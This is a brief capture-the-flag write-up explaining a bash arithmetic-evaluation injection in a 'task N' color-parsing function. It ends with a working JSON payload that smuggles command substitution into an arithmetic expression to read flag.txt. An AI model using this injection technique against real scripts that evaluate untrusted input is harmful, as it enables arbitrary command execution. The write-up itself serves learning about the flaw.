Tags: bash rce 

Rating: 2.0

After fiddling around, I've found a strange code segment:

parseString() {
local task_i
local result_str="${!res}"
for (( task_i=0; task_i < ${#result_str}; task_i++ )); do
if [[ "${result_str:$task_i:5}" = "task " ]]; then
local suffix="${result_str:$((task_i+5)):$((${#result_str}-task_i-5))}"
if [[ "$((suffix > 0))" = "1" && "$((suffix <= 8))" = "1" ]]; then
local color=$var_name
normalizeNumber "$suffix" $color "var_"
eval ${res}'[_color]=${color}'

Basically, strings with values like `task N` were evalutated in a special way to produce colors.

However, arithmetic evaluation is vulnerable to an injection. This allows to modify arbitrary variables (but only to change them to some numeric values):

"task 1+(i=42)+(suffix=0)"

After some poking around, reading `man bash` and crying, I've discovered, that [this work has already been done](https://github.com/p4-team/ctf/tree/master/2019-10-19-seccon/multiplicater) and it's possible to just execute arbitrary commands. Final exploit:

{"a": "task 1+(var_10=__[$(cat flag.txt >&2)])+(suffix=0)", "b": "c", "d": 55}